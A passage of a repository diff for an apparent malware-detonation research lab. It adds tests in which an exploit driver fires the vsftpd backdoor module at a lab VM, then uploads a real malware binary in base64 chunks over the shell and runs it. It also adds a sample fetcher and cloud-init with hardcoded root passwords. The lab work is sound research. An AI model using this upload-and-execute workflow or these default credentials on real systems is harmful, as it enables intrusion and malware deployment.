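from enum import Enum


class Outcome(Enum):
    SHIPPED = "shipped"      # retire the episode dir, delete the tarball
    CONFLICT = "conflict"    # keep the episode dir, needs operator triage
    TRANSIENT = "transient"  # keep dir and tarball, retry on the next pass


def classify_upload(status_code: int) -> Outcome:
    """Map an upload's HTTP status to a queue outcome.

    A status of 0 stands for "no HTTP response at all", mirroring the
    ping tests where an unreachable receiver reports status_code == 0.
    """
    if 200 <= status_code < 300:
        return Outcome.SHIPPED
    if status_code == 409:
        return Outcome.CONFLICT
    # Assumption: everything else (0, 401, 5xx, ...) is retried later.
    return Outcome.TRANSIENT
```

Keeping the mapping free of I/O makes it easy to unit-test separately from the live-receiver fixture used above.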
258
tests/test_tier4.py
Normal file
|
|
@@ -0,0 +1,258 @@
|
|||
"""Tests for the Tier-4 path:
|
||||
- real_binary_workload constructs valid shell commands
|
||||
- Sample.binary_path resolves correctly
|
||||
- MSFExploitDriver.real-sample dispatch picks the upload+exec path
|
||||
when a binary is staged, mimic when it isn't
|
||||
- tools/fetch_sample input validation (we don't hit the live API)
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import hashlib
|
||||
from pathlib import Path
|
||||
|
||||
import pytest
|
||||
|
||||
from exploits.driver import DriverConfig, MSFExploitDriver
|
||||
from exploits.modules import load_module_config
|
||||
from exploits.workloads import (
|
||||
chunked_real_binary_upload, real_binary_workload,
|
||||
)
|
||||
from samples.manifest import Sample
|
||||
|
||||
|
||||
REPO_ROOT = Path(__file__).resolve().parent.parent
|
||||
MODULES_DIR = REPO_ROOT / "exploits" / "modules"
|
||||
|
||||
|
||||
# Reuse the FakeMSFRpcClient from test_exploits.py.
|
||||
from tests.test_exploits import FakeMSFRpcClient # noqa: E402
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# real_binary_workload
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_real_binary_workload_embeds_base64() -> None:
|
||||
payload = b"\x7fELF" + b"\x00" * 64 # tiny ELF-shaped header
|
||||
w = real_binary_workload(payload)
|
||||
# Start command bundles a chunked upload (printf '%s' '<b64>' >> file).
|
||||
# Pull all b64 segments out and confirm they round-trip.
|
||||
import base64 as _b64
|
||||
import re
|
||||
matches = re.findall(r"printf '%s' '([A-Za-z0-9+/=]+)'", w.start_cmd)
|
||||
assert matches, "expected printf-based b64 chunks in start_cmd"
|
||||
decoded = _b64.b64decode("".join(matches))
|
||||
assert decoded == payload
|
||||
|
||||
|
||||
def test_chunked_real_binary_upload_splits_correctly() -> None:
    """A binary larger than the chunk size should produce >1 chunks
    plus a finalize + exec. Each chunk's payload must be individually
    valid base64 and the concatenation must round-trip."""
    import base64 as _b64
    import re

    # Build a payload large enough to force multiple chunks.
    payload = b"\x90\xab" * 8000
    plan = chunked_real_binary_upload(payload)
    assert plan.n_chunks >= 3  # 1 init + 2+ data chunks
    # hashlib is already imported at module level.
    assert plan.expected_sha256 == hashlib.sha256(payload).hexdigest()

    # Reconstruct from chunks.
    segs = []
    for c in plan.chunks:
        m = re.search(r"printf '%s' '([A-Za-z0-9+/=]+)'", c)
        if m:
            segs.append(m.group(1))
    assert segs, "no data chunks parsed"
    decoded = _b64.b64decode("".join(segs))
    assert decoded == payload

    # finalize_cmd verifies the sha256 we computed.
    assert plan.expected_sha256 in plan.finalize_cmd
    assert "sha256sum" in plan.finalize_cmd
|
||||
|
||||
|
||||
def test_real_binary_workload_stop_kills_pidfile() -> None:
|
||||
w = real_binary_workload(b"x" * 16)
|
||||
assert "kill" in w.stop_cmd
|
||||
assert ".cis490-real" in w.stop_cmd
|
||||
|
||||
|
||||
def test_real_binary_workload_per_profile_isolation() -> None:
|
||||
a = real_binary_workload(b"\x00", sample=Sample(name="a", family="A", category="rat", profile="cpu-saturate"))
|
||||
b = real_binary_workload(b"\x00", sample=Sample(name="b", family="B", category="rat", profile="bursty-c2"))
|
||||
# Different profiles → different /tmp paths so concurrent samples
|
||||
# don't stomp each other in the same guest.
|
||||
assert a.profile != b.profile
|
||||
assert a.start_cmd != b.start_cmd
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Sample.binary_path
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_binary_path_resolves_when_staged(tmp_path: Path) -> None:
|
||||
sha = "a" * 64
|
||||
(tmp_path / sha).write_bytes(b"hello")
|
||||
s = Sample(name="x", family="X", category="rat", profile="cpu-saturate", sha256=sha)
|
||||
assert s.binary_path(tmp_path) == tmp_path / sha
|
||||
|
||||
|
||||
def test_binary_path_none_when_missing(tmp_path: Path) -> None:
|
||||
s = Sample(name="x", family="X", category="rat", profile="cpu-saturate", sha256="b" * 64)
|
||||
assert s.binary_path(tmp_path) is None
|
||||
|
||||
|
||||
def test_binary_path_none_for_mimic_sample(tmp_path: Path) -> None:
|
||||
s = Sample(name="x", family="X", category="rat", profile="cpu-saturate")
|
||||
assert s.binary_path(tmp_path) is None
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Driver dispatch
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_driver_picks_real_binary_when_staged(tmp_path: Path) -> None:
|
||||
payload = b"\x7fELF\x02" + b"\x00" * 60
|
||||
sha = hashlib.sha256(payload).hexdigest()
|
||||
(tmp_path / sha).write_bytes(payload)
|
||||
|
||||
sample = Sample(
|
||||
name="real-x", family="X", category="rat",
|
||||
profile="cpu-saturate", sha256=sha,
|
||||
)
|
||||
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
|
||||
client = FakeMSFRpcClient(sessions_after_fire={1: {"type": "shell"}})
|
||||
driver = MSFExploitDriver(
|
||||
client=client, # type: ignore[arg-type]
|
||||
module=cfg,
|
||||
cfg=DriverConfig(
|
||||
target_ip="10.200.0.10",
|
||||
session_open_timeout_s=0.5,
|
||||
sample_store_root=tmp_path,
|
||||
),
|
||||
emit_event=lambda *a, **kw: None,
|
||||
sample=sample,
|
||||
)
|
||||
# Driver picks the chunked-upload path.
|
||||
assert driver.workload is not None
|
||||
assert driver.workload.profile.startswith("real:")
|
||||
assert driver._chunked is not None
|
||||
assert driver._chunked.expected_sha256 == sha
|
||||
|
||||
|
||||
def test_driver_walks_chunked_upload_in_session(tmp_path: Path) -> None:
|
||||
"""End-to-end: at infected_running, the driver should issue every
|
||||
chunk + finalize + exec as separate shell_write calls. The fake
|
||||
client records them in order so we can verify."""
|
||||
payload = b"\xde\xad\xbe\xef" * 4096 # 16 KiB → multiple chunks
|
||||
sha = hashlib.sha256(payload).hexdigest()
|
||||
(tmp_path / sha).write_bytes(payload)
|
||||
|
||||
sample = Sample(
|
||||
name="real-multi", family="X", category="rat",
|
||||
profile="bursty-c2", sha256=sha,
|
||||
)
|
||||
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
|
||||
|
||||
# Patch the fake to return "sha-ok" so the verify step passes.
|
||||
client = FakeMSFRpcClient(sessions_after_fire={1: {"type": "shell"}})
|
||||
client._verify_response = "sha-ok\n"
|
||||
real_read = client.session_shell_read
|
||||
def shell_read_with_verify(sid):
|
||||
# Return verify token after the finalize command — i.e. once
|
||||
# the most recent shell_write contained "sha256sum".
|
||||
last = client.shell_writes[-1][1] if client.shell_writes else ""
|
||||
if "sha256sum" in last:
|
||||
return "sha-ok\n"
|
||||
return real_read(sid)
|
||||
client.session_shell_read = shell_read_with_verify # type: ignore[assignment]
|
||||
|
||||
events: list[tuple[str, dict]] = []
|
||||
driver = MSFExploitDriver(
|
||||
client=client, # type: ignore[arg-type]
|
||||
module=cfg,
|
||||
cfg=DriverConfig(
|
||||
target_ip="10.200.0.10",
|
||||
session_open_timeout_s=0.5,
|
||||
sample_store_root=tmp_path,
|
||||
),
|
||||
emit_event=lambda ev, **kw: events.append((ev, kw)),
|
||||
sample=sample,
|
||||
)
|
||||
driver.setup()
|
||||
driver.set_phase("armed")
|
||||
driver.set_phase("infecting")
|
||||
driver.set_phase("infected_running")
|
||||
|
||||
# All chunks + finalize + exec went through shell_write.
|
||||
writes = [w for (_, w) in client.shell_writes]
|
||||
n_printf = sum(1 for w in writes if w.startswith("printf '%s'"))
|
||||
n_finalize = sum(1 for w in writes if "sha256sum" in w)
|
||||
n_exec = sum(1 for w in writes if "nohup" in w and ".cis490-real" in w)
|
||||
assert n_printf >= 2, f"expected multiple chunks, saw {n_printf}"
|
||||
assert n_finalize == 1
|
||||
assert n_exec == 1
|
||||
|
||||
# Events tell the same story.
|
||||
names = [e for (e, _) in events]
|
||||
assert "real_binary_upload_begin" in names
|
||||
assert "real_binary_verify" in names
|
||||
assert any(e == "sample_executed" and kw.get("kind") == "real"
|
||||
for (e, kw) in events)
|
||||
|
||||
|
||||
def test_driver_falls_back_to_mimic_when_real_binary_missing(tmp_path: Path) -> None:
|
||||
sample = Sample(
|
||||
name="real-but-missing", family="X", category="rat",
|
||||
profile="bursty-c2", sha256="c" * 64,
|
||||
)
|
||||
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
|
||||
client = FakeMSFRpcClient(sessions_after_fire={1: {"type": "shell"}})
|
||||
driver = MSFExploitDriver(
|
||||
client=client, # type: ignore[arg-type]
|
||||
module=cfg,
|
||||
cfg=DriverConfig(
|
||||
target_ip="10.200.0.10",
|
||||
session_open_timeout_s=0.5,
|
||||
sample_store_root=tmp_path, # empty
|
||||
),
|
||||
emit_event=lambda *a, **kw: None,
|
||||
sample=sample,
|
||||
)
|
||||
# Mimic workload selected because the binary isn't staged.
|
||||
assert driver.workload is not None
|
||||
assert driver.workload.profile == "bursty-c2"
|
||||
assert "real:" not in driver.workload.profile
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Fetcher input validation
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_fetch_sample_rejects_bad_sha(tmp_path: Path) -> None:
|
||||
from tools.fetch_sample import fetch_sample
|
||||
|
||||
with pytest.raises(ValueError, match="64 hex chars"):
|
||||
fetch_sample("not-a-hash", tmp_path, api_key="x")
|
||||
|
||||
|
||||
def test_fetch_sample_returns_existing_when_hash_matches(tmp_path: Path) -> None:
|
||||
from tools.fetch_sample import fetch_sample
|
||||
|
||||
payload = b"already staged bytes"
|
||||
sha = hashlib.sha256(payload).hexdigest()
|
||||
p = tmp_path / sha
|
||||
p.write_bytes(payload)
|
||||
# api_key is unused on the cached path; pass anything.
|
||||
out = fetch_sample(sha, tmp_path, api_key="ignored")
|
||||
assert out == p
|
||||
# File untouched.
|
||||
assert p.read_bytes() == payload
|
||||
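The `binary_path` tests above pin down a content-addressed lookup: a staged binary lives at `<store_root>/<sha256>`, and the lookup yields `None` both when the file is absent and when the sample carries no hash at all. A minimal sketch of that contract follows. `resolve_binary` and `_SHA256_RE` are hypothetical names used only for illustration, not the repo's `Sample.binary_path` implementation, and the lowercase-hex check is an assumption modelled on the fetcher's "64 hex chars" error.

```python
import re
import tempfile
from pathlib import Path
from typing import Optional

# Hypothetical pattern: a SHA-256 digest rendered as 64 lowercase hex chars.
_SHA256_RE = re.compile(r"[0-9a-f]{64}")


def resolve_binary(store_root: Path, sha256: Optional[str]) -> Optional[Path]:
    """Return store_root/<sha256> if that file is staged, else None."""
    if sha256 is None:
        return None  # mimic-only sample: there is no real binary to look up
    if _SHA256_RE.fullmatch(sha256) is None:
        raise ValueError("sha256 must be 64 hex chars")
    candidate = store_root / sha256
    return candidate if candidate.is_file() else None


with tempfile.TemporaryDirectory() as d:
    root = Path(d)
    staged = "a" * 64
    (root / staged).write_bytes(b"hello")
    found = resolve_binary(root, staged)       # staged: path comes back
    missing = resolve_binary(root, "b" * 64)   # valid hash, nothing staged
    mimic = resolve_binary(root, None)         # no hash on the sample
```

Returning `None` rather than raising for the two "no binary" cases is what lets a caller fall back to a mimic workload without special-casing either one.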
213
tests/test_vm_load_controller.py
Normal file
|
|
@@ -0,0 +1,213 @@
|
|||
"""Tests for VMLoadController against a fake SerialClient.
|
||||
|
||||
The controller's only job is to translate phases into shell commands
|
||||
on a serial console and emit audit events. The key invariants we
|
||||
encode here come from the elliott-lab incident, where every phase
|
||||
showed a median of 20% CPU because the workload silently never fired:
|
||||
|
||||
- every set_phase emits some event (so absence in events.jsonl is
|
||||
a hard signal)
|
||||
- infected_running emits workload_started AFTER sending the load
|
||||
command
|
||||
- dormant emits workload_killed WITH a pre_kill_probe so trainers
|
||||
can detect "the workload was never running"
|
||||
- exceptions in the shell call surface as workload_failed; they
|
||||
do NOT propagate (the runner's on_phase callback would swallow
|
||||
them anyway, but we want the audit row regardless)
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import sys
|
||||
from pathlib import Path
|
||||
|
||||
import pytest
|
||||
|
||||
# Mirror the same path hack run_real_vm_demo.py uses so the tools/
|
||||
# module imports work.
|
||||
ROOT = Path(__file__).resolve().parent.parent
|
||||
sys.path.insert(0, str(ROOT))
|
||||
sys.path.insert(0, str(ROOT / "tools"))
|
||||
|
||||
from samples.manifest import Sample
|
||||
from vm_load_controller import VMLoadController # noqa: E402
|
||||
|
||||
|
||||
class FakeSerial:
|
||||
"""Records every shell command. Returns canned probe output."""
|
||||
|
||||
def __init__(self, probe_response: str = "yes=1\nsh=1\nloadavg=0.45") -> None:
|
||||
self.calls: list[str] = []
|
||||
self.probe_response = probe_response
|
||||
self.fail_on: list[str] = []
|
||||
|
||||
def run(self, cmd: str, timeout_s: float = 10.0) -> str:
|
||||
self.calls.append(cmd)
|
||||
for substr in self.fail_on:
|
||||
if substr in cmd:
|
||||
raise RuntimeError(f"fake-serial: failing on {substr!r}")
|
||||
if "pgrep -c yes" in cmd or "pgrep -c sh" in cmd or "loadavg" in cmd:
|
||||
return self.probe_response
|
||||
return ""
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Event emission — the audit trail
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_setup_emits_workload_setup_event() -> None:
|
||||
serial = FakeSerial()
|
||||
events: list[tuple[str, dict]] = []
|
||||
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
|
||||
c.setup()
|
||||
names = [e for e, _ in events]
|
||||
assert "workload_setup" in names
|
||||
setup = next(kw for e, kw in events if e == "workload_setup")
|
||||
assert setup["profile"] == "v1-yes" # no Sample → fallback path
|
||||
assert setup["sample"] is None
|
||||
|
||||
|
||||
def test_setup_records_profile_when_sample_present() -> None:
|
||||
serial = FakeSerial()
|
||||
s = Sample(name="x", family="X", category="rat", profile="cpu-saturate")
|
||||
events: list[tuple[str, dict]] = []
|
||||
c = VMLoadController(serial, sample=s, emit_event=lambda e, **kw: events.append((e, kw)))
|
||||
c.setup()
|
||||
setup = next(kw for e, kw in events if e == "workload_setup")
|
||||
assert setup["profile"] == "cpu-saturate"
|
||||
assert setup["sample"] == "x"
|
||||
|
||||
|
||||
def test_infected_running_emits_workload_started_after_command() -> None:
|
||||
serial = FakeSerial()
|
||||
events: list[tuple[str, dict]] = []
|
||||
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
|
||||
c.set_phase("infected_running")
|
||||
|
||||
# The command was sent.
|
||||
assert any("yes > /dev/null" in cmd for cmd in serial.calls), \
|
||||
f"expected v1 yes-loop in serial calls; got {serial.calls}"
|
||||
# And the audit event followed it.
|
||||
started = [kw for e, kw in events if e == "workload_started"]
|
||||
assert started, "workload_started event must fire"
|
||||
assert started[0]["phase"] == "infected_running"
|
||||
assert started[0]["profile"] == "v1-yes"
|
||||
|
||||
|
||||
def test_dormant_probes_before_killing() -> None:
|
||||
"""The pre_kill_probe is the load-bearing diagnostic: it tells the
|
||||
trainer whether the workload was actually running before we
|
||||
killed it. If pgrep reports zero `yes` processes, the preceding
|
||||
infected_running phase was a no-op and the episode can be filtered out."""
|
||||
serial = FakeSerial(probe_response="yes=2\nsh=1\nloadavg=1.32")
|
||||
events: list[tuple[str, dict]] = []
|
||||
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
|
||||
c.set_phase("dormant")
|
||||
|
||||
killed = [kw for e, kw in events if e == "workload_killed" and kw["phase"] == "dormant"]
|
||||
assert killed, "dormant must emit workload_killed"
|
||||
probe = killed[0].get("pre_kill_probe")
|
||||
assert probe is not None
|
||||
assert probe["yes"] == "2"
|
||||
assert probe["loadavg"] == "1.32"
|
||||
|
||||
|
||||
def test_dormant_probe_records_zero_when_workload_never_ran() -> None:
|
||||
"""The exact symptom from elliott-lab: dormant probe shows 0
|
||||
yes processes → trainer can flag this episode as workload-not-firing."""
|
||||
serial = FakeSerial(probe_response="yes=0\nsh=1\nloadavg=0.18")
|
||||
events: list[tuple[str, dict]] = []
|
||||
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
|
||||
c.set_phase("dormant")
|
||||
killed = next(kw for e, kw in events if e == "workload_killed" and kw["phase"] == "dormant")
|
||||
assert killed["pre_kill_probe"]["yes"] == "0"
|
||||
|
||||
|
||||
def test_clean_phase_emits_workload_killed() -> None:
|
||||
serial = FakeSerial()
|
||||
events: list[tuple[str, dict]] = []
|
||||
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
|
||||
c.set_phase("clean")
|
||||
assert any(
|
||||
e == "workload_killed" and kw["phase"] == "clean" for e, kw in events
|
||||
), "clean must emit workload_killed"
|
||||
|
||||
|
||||
def test_armed_emits_workload_armed_with_handshake_command() -> None:
|
||||
serial = FakeSerial()
|
||||
events: list[tuple[str, dict]] = []
|
||||
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
|
||||
c.set_phase("armed")
|
||||
assert any("armed-handshake" in cmd for cmd in serial.calls)
|
||||
assert any(e == "workload_armed" for e, _ in events)
|
||||
|
||||
|
||||
def test_infecting_emits_workload_infecting_with_dd() -> None:
|
||||
serial = FakeSerial()
|
||||
events: list[tuple[str, dict]] = []
|
||||
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
|
||||
c.set_phase("infecting")
|
||||
assert any("dd if=/dev/urandom" in cmd for cmd in serial.calls)
|
||||
assert any(e == "workload_infecting" for e, _ in events)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Exception handling — failures must surface as events, not propagate
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_command_failure_emits_workload_failed_and_does_not_raise() -> None:
|
||||
"""If serial.run() raises (timeout, EOF, bad login), the
|
||||
runner would silently swallow the exception. We want a hard
|
||||
audit row in events.jsonl regardless."""
|
||||
serial = FakeSerial()
|
||||
serial.fail_on = ["yes > /dev/null"]
|
||||
events: list[tuple[str, dict]] = []
|
||||
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
|
||||
# Must NOT raise.
|
||||
c.set_phase("infected_running")
|
||||
failed = [kw for e, kw in events if e == "workload_failed"]
|
||||
assert failed, "expected workload_failed event"
|
||||
assert failed[0]["phase"] == "infected_running"
|
||||
assert "fake-serial" in failed[0]["error"]
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Profile dispatch — Sample-driven workload picks the right command
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_sample_with_profile_uses_workloads_module_command() -> None:
|
||||
"""When constructed with a Sample, infected_running runs the
|
||||
profile's start_cmd (from exploits.workloads) — NOT the v1 yes-loop."""
|
||||
s = Sample(name="x", family="X", category="cryptominer", profile="cpu-saturate")
|
||||
serial = FakeSerial()
|
||||
events: list[tuple[str, dict]] = []
|
||||
c = VMLoadController(serial, sample=s, emit_event=lambda e, **kw: events.append((e, kw)))
|
||||
c.set_phase("infected_running")
|
||||
|
||||
# The sample's workload script + the post-kill yes sweep both ran.
|
||||
# The new workload is profile-shaped, not the simple yes-loop.
|
||||
profile_command_seen = any(".cis490-workload-cpu-saturate" in cmd for cmd in serial.calls)
|
||||
assert profile_command_seen, f"expected workload script in serial calls; got {serial.calls}"
|
||||
started = next(kw for e, kw in events if e == "workload_started")
|
||||
assert started["profile"] == "cpu-saturate"
|
||||
assert started["sample"] == "x"
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Default emit (no callback supplied) is a no-op
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_no_emit_callback_is_safe() -> None:
|
||||
"""Tests + code paths that don't pass an emitter shouldn't
|
||||
crash. The default is a no-op lambda."""
|
||||
serial = FakeSerial()
|
||||
c = VMLoadController(serial)
|
||||
# Should not raise.
|
||||
c.setup()
|
||||
c.set_phase("infected_running")
|
||||
c.set_phase("dormant")
|
||||
c.set_phase("clean")
|
||||
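The dormant-phase tests above treat the probe as `key=value` lines (`yes=2`, `sh=1`, `loadavg=1.32`) whose values stay strings in the `pre_kill_probe` payload. A minimal sketch of that parsing step, plus the "workload never ran" check a trainer might apply, is shown here. Both function names are hypothetical; the controller's actual parser is not part of this diff, and the zero-`yes` check only makes sense for the v1 yes-loop profile.

```python
def parse_probe(output: str) -> dict[str, str]:
    """Turn 'key=value' lines into a dict, keeping values as strings."""
    probe: dict[str, str] = {}
    for line in output.splitlines():
        key, sep, value = line.strip().partition("=")
        if sep and key:  # skip blank lines and lines without '='
            probe[key] = value
    return probe


def workload_never_ran(probe: dict[str, str]) -> bool:
    """True when the probe saw zero `yes` processes before the kill."""
    return probe.get("yes", "0") == "0"


running = parse_probe("yes=2\nsh=1\nloadavg=1.32")
idle = parse_probe("yes=0\nsh=1\nloadavg=0.18")
```

Keeping the values as strings mirrors what the tests assert (`probe["yes"] == "2"`), so a malformed reading is recorded verbatim instead of failing the phase change.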
|
|
@@ -28,7 +28,7 @@ from pathlib import Path
|
|||
import pycdlib
|
||||
|
||||
|
||||
DEFAULT_USER_DATA = """\
|
||||
DEFAULT_USER_DATA_HEAD = """\
|
||||
#cloud-config
|
||||
hostname: cis490
|
||||
manage_etc_hosts: true
|
||||
|
|
@@ -45,10 +45,70 @@ chpasswd:
|
|||
list: |
|
||||
root:cis490
|
||||
cis490:cis490
|
||||
runcmd:
|
||||
- [ sh, -c, "echo CIS490_BOOT_OK > /tmp/.cis490-boot" ]
|
||||
"""
|
||||
|
||||
# OpenRC service file shipped inside the guest. Alpine uses OpenRC;
|
||||
# the runcmd at the bottom of user-data wires it up on first boot.
|
||||
OPENRC_SERVICE = """\
|
||||
#!/sbin/openrc-run
|
||||
|
||||
description="CIS490 in-guest telemetry agent"
|
||||
command="/usr/local/bin/cis490-agent"
|
||||
command_args="--port /dev/virtio-ports/cis490.guest.agent"
|
||||
command_background=true
|
||||
pidfile="/run/cis490-agent.pid"
|
||||
output_log="/var/log/cis490-agent.log"
|
||||
error_log="/var/log/cis490-agent.log"
|
||||
|
||||
depend() {
|
||||
need localmount
|
||||
}
|
||||
"""
|
||||
|
||||
DEFAULT_META_DATA = """\
|
||||
instance-id: cis490-vm-001
|
||||
local-hostname: cis490
|
||||
"""
|
||||
|
||||
|
||||
def _indent(text: str, n: int) -> str:
|
||||
pad = " " * n
|
||||
return "\n".join(pad + line if line else line for line in text.splitlines())
|
||||
|
||||
|
||||
def build_user_data(*, embed_agent: bool, agent_path: Path | None) -> bytes:
|
||||
"""Build a cloud-init user-data document. When ``embed_agent`` is
|
||||
True, also stuff the in-guest agent + an OpenRC service into
|
||||
``write_files`` and arrange to start the service on first boot."""
|
||||
head = DEFAULT_USER_DATA_HEAD
|
||||
if not embed_agent:
|
||||
return (head + 'runcmd:\n - [ sh, -c, "echo CIS490_BOOT_OK > /tmp/.cis490-boot" ]\n').encode()
|
||||
|
||||
if agent_path is None:
|
||||
agent_path = Path(__file__).resolve().parent.parent / "vm" / "guest-agent" / "cis490_agent.py"
|
||||
if not agent_path.exists():
|
||||
raise FileNotFoundError(f"agent script not found: {agent_path}")
|
||||
agent_src = agent_path.read_text()
|
||||
|
||||
body = head + (
|
||||
"write_files:\n"
|
||||
" - path: /usr/local/bin/cis490-agent\n"
|
||||
" permissions: '0755'\n"
|
||||
" owner: root:root\n"
|
||||
" content: |\n"
|
||||
f"{_indent(agent_src, 6)}\n"
|
||||
" - path: /etc/init.d/cis490-agent\n"
|
||||
" permissions: '0755'\n"
|
||||
" owner: root:root\n"
|
||||
" content: |\n"
|
||||
f"{_indent(OPENRC_SERVICE, 6)}\n"
|
||||
"runcmd:\n"
|
||||
' - [ sh, -c, "echo CIS490_BOOT_OK > /tmp/.cis490-boot" ]\n'
|
||||
' - [ sh, -c, "command -v rc-update >/dev/null && rc-update add cis490-agent default || true" ]\n'
|
||||
' - [ sh, -c, "command -v rc-service >/dev/null && rc-service cis490-agent start || true" ]\n'
|
||||
)
|
||||
return body.encode()
|
||||
|
||||
DEFAULT_META_DATA = """\
|
||||
instance-id: cis490-vm-001
|
||||
local-hostname: cis490
|
||||
|
|
@@ -93,11 +153,26 @@ def main() -> int:
|
|||
default=None,
|
||||
help="path to a custom meta-data file",
|
||||
)
|
||||
parser.add_argument(
|
||||
"--no-embed-agent",
|
||||
action="store_true",
|
||||
help="don't bake the in-guest agent into user-data",
|
||||
)
|
||||
parser.add_argument(
|
||||
"--agent-path",
|
||||
type=Path,
|
||||
default=None,
|
||||
help="path to the in-guest agent (default: vm/guest-agent/cis490_agent.py)",
|
||||
)
|
||||
args = parser.parse_args()
|
||||
|
||||
user_data = (
|
||||
args.user_data.read_bytes() if args.user_data else DEFAULT_USER_DATA.encode()
|
||||
)
|
||||
if args.user_data:
|
||||
user_data = args.user_data.read_bytes()
|
||||
else:
|
||||
user_data = build_user_data(
|
||||
embed_agent=not args.no_embed_agent,
|
||||
agent_path=args.agent_path,
|
||||
)
|
||||
meta_data = (
|
||||
args.meta_data.read_bytes() if args.meta_data else DEFAULT_META_DATA.encode()
|
||||
)
|
||||
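`build_user_data` embeds whole files into cloud-init's `write_files` by indenting them under a YAML literal block scalar (`content: |`). The sketch below isolates that step so the indentation arithmetic is visible: list items sit at 2 spaces, their keys at 4, and the file body at 6. `write_files_entry` is a hypothetical helper for illustration; `indent` mirrors the `_indent` function in the diff.

```python
def indent(text: str, n: int) -> str:
    """Prefix every non-empty line with n spaces; leave blank lines empty."""
    pad = " " * n
    return "\n".join(pad + line if line else line for line in text.splitlines())


def write_files_entry(path: str, content: str, mode: str = "0755") -> str:
    """Render one cloud-init write_files item with the content inlined."""
    return (
        f"  - path: {path}\n"
        f"    permissions: '{mode}'\n"
        "    owner: root:root\n"
        "    content: |\n"
        f"{indent(content, 6)}\n"
    )


script = "#!/bin/sh\n\necho hello\n"
entry = write_files_entry("/usr/local/bin/demo", script)
lines = entry.splitlines()
```

Leaving blank lines unpadded is safe inside a literal block scalar, and it avoids trailing whitespace in the generated user-data.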
|
|
|
|||
638
tools/cis490_doctor.py
Normal file
|
|
@@ -0,0 +1,638 @@
|
|||
"""``cis490-doctor`` — single-command diagnostic for a lab host or receiver.
|
||||
|
||||
Walks the full bring-up stack from the bottom up and prints a
|
||||
green/yellow/red checklist with the exact command that fixes each
|
||||
red row. Run this whenever:
|
||||
|
||||
- you just cloned the repo and aren't sure what's missing
|
||||
- you ran install-lab-host.sh but `index.jsonl` on the Pi is empty
|
||||
- somebody filed an issue saying "shipping isn't working"
|
||||
|
||||
Usage:
|
||||
uv run python tools/cis490_doctor.py # human output
|
||||
uv run python tools/cis490_doctor.py --json # machine-readable
|
||||
uv run python tools/cis490_doctor.py --role lab-host # default
|
||||
uv run python tools/cis490_doctor.py --role receiver
|
||||
|
||||
Exits non-zero if any RED check fails.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import argparse
|
||||
import dataclasses
|
||||
import json
|
||||
import os
|
||||
import shutil
|
||||
import socket
|
||||
import ssl
|
||||
import subprocess
|
||||
import sys
|
||||
import tomllib
|
||||
from dataclasses import dataclass, field
|
||||
from pathlib import Path
|
||||
|
||||
|
||||
# ANSI color codes; disabled when stdout is not a TTY or NO_COLOR is set.
|
||||
def _supports_color() -> bool:
|
||||
return sys.stdout.isatty() and os.environ.get("NO_COLOR") is None
|
||||
|
||||
|
||||
_ANSI_GREEN = "\033[32m" if _supports_color() else ""
|
||||
_ANSI_YELLOW = "\033[33m" if _supports_color() else ""
|
||||
_ANSI_RED = "\033[31m" if _supports_color() else ""
|
||||
_ANSI_BOLD = "\033[1m" if _supports_color() else ""
|
||||
_ANSI_DIM = "\033[2m" if _supports_color() else ""
|
||||
_ANSI_RESET = "\033[0m" if _supports_color() else ""
|
||||
|
||||
|
||||
@dataclass
|
||||
class Check:
|
||||
name: str
|
||||
status: str # "ok" | "warn" | "fail" | "skip"
|
||||
detail: str = ""
|
||||
fix: str = ""
|
||||
|
||||
def render(self) -> str:
|
||||
glyph = {
|
||||
"ok": f"{_ANSI_GREEN}[✓]{_ANSI_RESET}",
|
||||
"warn": f"{_ANSI_YELLOW}[!]{_ANSI_RESET}",
|
||||
"fail": f"{_ANSI_RED}[✗]{_ANSI_RESET}",
|
||||
"skip": f"{_ANSI_DIM}[-]{_ANSI_RESET}",
|
||||
}[self.status]
|
||||
line = f"{glyph} {self.name}"
|
||||
if self.detail:
|
||||
line += f" {_ANSI_DIM}{self.detail}{_ANSI_RESET}"
|
||||
if self.status == "fail" and self.fix:
|
||||
line += f"\n {_ANSI_BOLD}fix:{_ANSI_RESET} {self.fix}"
|
||||
return line
|
||||
|
||||
|
||||
@dataclass
|
||||
class Report:
|
||||
role: str
|
||||
checks: list[Check] = field(default_factory=list)
|
||||
|
||||
def add(self, c: Check) -> None:
|
||||
self.checks.append(c)
|
||||
# Mirror to stdout immediately so a hung check doesn't leave
|
||||
# the operator without partial info.
|
||||
if not _JSON_MODE:
|
||||
print(c.render(), flush=True)
|
||||
|
||||
